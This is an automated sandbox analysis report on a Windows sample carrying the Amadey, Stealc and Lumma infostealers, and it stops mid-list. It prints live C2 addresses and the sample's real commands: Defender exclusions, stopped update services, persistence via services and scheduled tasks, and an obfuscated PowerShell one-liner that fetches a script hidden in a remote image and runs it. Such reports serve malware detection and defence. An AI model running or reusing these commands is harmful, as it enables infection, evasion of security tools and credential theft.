Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-12-2024 00:58

General

  • Target

    f1c6bca69edc779f4a0ef441ddb33963b7a6386599acec1c8f40cca46c97e4ff.exe

  • Size

    1.8MB

  • MD5

    c645e45b9fa2dc424410aab33ae98ec1

  • SHA1

    950026bbd5d4b42437aa6c07375e744197c29ce2

  • SHA256

    f1c6bca69edc779f4a0ef441ddb33963b7a6386599acec1c8f40cca46c97e4ff

  • SHA512

    e72e6a680508f16a2422890712ab6d72f009e76ddeea480278f63adc2ce3254d73c49b6df7d383ecfc4c0b8a81fe296d8401e96cf609d3fae37d57c411d06188

  • SSDEEP

    49152:UZuUxb0Xn1mZUX+gtqAWx6lQYbCKM+JRpKVSuoPl/Hym:UZf6bTtqX6lQYbvfJcSXJym

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

default_valenciga

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://drive-connect.cyou/api

https://crib-endanger.sbs/api

https://faintbl0w.sbs/api

https://300snails.sbs/api

https://bored-light.sbs/api

https://3xc1aimbl0w.sbs/api

https://pull-trucker.sbs/api

https://fleez-inc.sbs/api

https://thicktoys.sbs/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://drive-connect.cyou/api

https://se-blurry.biz/api

https://zinc-sneark.biz/api

https://dare-curbys.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • UAC bypass 3 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 26 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 59 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 50 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f1c6bca69edc779f4a0ef441ddb33963b7a6386599acec1c8f40cca46c97e4ff.exe
    "C:\Users\Admin\AppData\Local\Temp\f1c6bca69edc779f4a0ef441ddb33963b7a6386599acec1c8f40cca46c97e4ff.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3644
    • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4684
      • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
        "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:1792
      • C:\Users\Admin\AppData\Local\Temp\1001527001\lega.exe
        "C:\Users\Admin\AppData\Local\Temp\1001527001\lega.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1468
        • C:\Users\Admin\AppData\Local\Temp\1001527001\lega.exe
          "C:\Users\Admin\AppData\Local\Temp\1001527001\lega.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2480
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1288
            5⤵
            • Program crash
            PID:3392
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1308
            5⤵
            • Program crash
            PID:2180
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1272
            5⤵
            • Program crash
            PID:2812
      • C:\Users\Admin\AppData\Local\Temp\1002824001\b513e9846a.exe
        "C:\Users\Admin\AppData\Local\Temp\1002824001\b513e9846a.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4992
      • C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
        "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3340
        • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
          "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3144
          • C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe
            "C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe"
            5⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            PID:3368
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:6188
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              6⤵
                PID:7120
                • C:\Windows\system32\wusa.exe
                  wusa /uninstall /kb:890830 /quiet /norestart
                  7⤵
                    PID:3620
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop UsoSvc
                  6⤵
                  • Launches sc.exe
                  PID:6492
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                  6⤵
                  • Launches sc.exe
                  PID:4652
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop wuauserv
                  6⤵
                  • Launches sc.exe
                  PID:3788
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop bits
                  6⤵
                  • Launches sc.exe
                  PID:7148
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop dosvc
                  6⤵
                  • Launches sc.exe
                  PID:5680
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  6⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4296
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                  6⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4196
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  6⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5916
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                  6⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5900
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe delete "QKJNEQWA"
                  6⤵
                  • Launches sc.exe
                  PID:6168
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe create "QKJNEQWA" binpath= "C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe" start= "auto"
                  6⤵
                  • Launches sc.exe
                  PID:5340
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop eventlog
                  6⤵
                  • Launches sc.exe
                  PID:6544
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe start "QKJNEQWA"
                  6⤵
                  • Launches sc.exe
                  PID:5996
              • C:\Users\Admin\AppData\Local\Temp\10000361101\stail.exe
                "C:\Users\Admin\AppData\Local\Temp\10000361101\stail.exe"
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2944
                • C:\Users\Admin\AppData\Local\Temp\is-CU53V.tmp\stail.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-CU53V.tmp\stail.tmp" /SL5="$13024E,3404636,54272,C:\Users\Admin\AppData\Local\Temp\10000361101\stail.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  PID:4464
                  • C:\Windows\SysWOW64\net.exe
                    "C:\Windows\system32\net.exe" pause hevc_zond_1284
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:1956
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 pause hevc_zond_1284
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:4112
                  • C:\Users\Admin\AppData\Local\HEVC Zond 1.3.3.7\hevczond32_64.exe
                    "C:\Users\Admin\AppData\Local\HEVC Zond 1.3.3.7\hevczond32_64.exe" -i
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1020
          • C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
            "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1508
            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
              "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
              4⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1832
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\10009630142\asyno.ps1"
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Accesses Microsoft Outlook profiles
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                • outlook_office_path
                • outlook_win_path
                PID:4468
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\system32\schtasks.exe" /create /tn Admin /SC minute /MO 120 /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Admin\10009630142\asyno.ps1"" /F
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:4232
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd /c powershell -NoProfile -NonInteractive -WindowStyle Hidden -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,91,83,99,114,105,112,116,66,108,111,99,107,93,58,58,67,114,101,97,116,101,40,36,112,108,41,13,10,105,99,109,32,36,115,98,13,10,13,10,35,82,82,82,82)))); } c #d "
                  6⤵
                  • An obfuscated cmd.exe command-line is typically used to evade detection.
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3420
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -NoProfile -NonInteractive -WindowStyle Hidden -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,91,83,99,114,105,112,116,66,108,111,99,107,93,58,58,67,114,101,97,116,101,40,36,112,108,41,13,10,105,99,109,32,36,115,98,13,10,13,10,35,82,82,82,82)))); } c #d
                    7⤵
                    • UAC bypass
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:452
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                5⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1036
          • C:\Users\Admin\AppData\Local\Temp\1005242001\v_dolg.exe
            "C:\Users\Admin\AppData\Local\Temp\1005242001\v_dolg.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:664
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 1312
              4⤵
              • Program crash
              PID:2636
          • C:\Users\Admin\AppData\Local\Temp\1005690001\client.exe
            "C:\Users\Admin\AppData\Local\Temp\1005690001\client.exe"
            3⤵
            • Executes dropped EXE
            PID:4220
            • C:\Users\Admin\AppData\Local\Temp\onefile_4220_133781795557383583\client.exe
              C:\Users\Admin\AppData\Local\Temp\1005690001\client.exe
              4⤵
              • Drops startup file
              • Executes dropped EXE
              • Loads dropped DLL
              PID:5844
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "latest.exe"
                5⤵
                  PID:4668
                  • C:\Users\Admin\AppData\Local\Temp\latest.exe
                    latest.exe
                    6⤵
                    • Executes dropped EXE
                    PID:4332
                    • C:\Users\Admin\AppData\Local\Temp\onefile_4332_133781796108321520\all.exe
                      C:\Users\Admin\AppData\Local\Temp\latest.exe
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:6352
            • C:\Users\Admin\AppData\Local\Temp\1005797001\bb06e661d1.exe
              "C:\Users\Admin\AppData\Local\Temp\1005797001\bb06e661d1.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:6948
            • C:\Users\Admin\AppData\Local\Temp\1005798001\40cadfcc1a.exe
              "C:\Users\Admin\AppData\Local\Temp\1005798001\40cadfcc1a.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5428
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 5428 -s 1472
                4⤵
                • Program crash
                PID:3568
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 5428 -s 1500
                4⤵
                • Program crash
                PID:3632
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2480 -ip 2480
          1⤵
            PID:2684
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2480 -ip 2480
            1⤵
              PID:2896
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2480 -ip 2480
              1⤵
                PID:2252
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 664 -ip 664
                1⤵
                  PID:1484
                • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                  C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                  1⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1660
                • C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
                  C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
                  1⤵
                  • Executes dropped EXE
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5668
                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4624
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                    2⤵
                      PID:752
                      • C:\Windows\system32\wusa.exe
                        wusa /uninstall /kb:890830 /quiet /norestart
                        3⤵
                          PID:6432
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop UsoSvc
                        2⤵
                        • Launches sc.exe
                        PID:6604
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        2⤵
                        • Launches sc.exe
                        PID:732
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop wuauserv
                        2⤵
                        • Launches sc.exe
                        PID:5732
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop bits
                        2⤵
                        • Launches sc.exe
                        PID:7124
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop dosvc
                        2⤵
                        • Launches sc.exe
                        PID:7136
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        2⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5964
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                        2⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3084
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        2⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:6224
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                        2⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1208
                      • C:\Windows\system32\conhost.exe
                        C:\Windows\system32\conhost.exe
                        2⤵
                          PID:516
                        • C:\Windows\system32\cmd.exe
                          cmd.exe
                          2⤵
                          • Blocklisted process makes network request
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4384
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5428 -ip 5428
                        1⤵
                          PID:3980
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5428 -ip 5428
                          1⤵
                            PID:5532
                          • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                            C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                            1⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            PID:6264
                          • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                            C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                            1⤵
                            • Executes dropped EXE
                            PID:6756
                          • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                            C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                            1⤵
                            • Executes dropped EXE
                            PID:6356
                          • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                            C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                            1⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            PID:6236

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\ProgramData\mozglue.dll

                            Filesize

                            593KB

                            MD5

                            c8fd9be83bc728cc04beffafc2907fe9

                            SHA1

                            95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                            SHA256

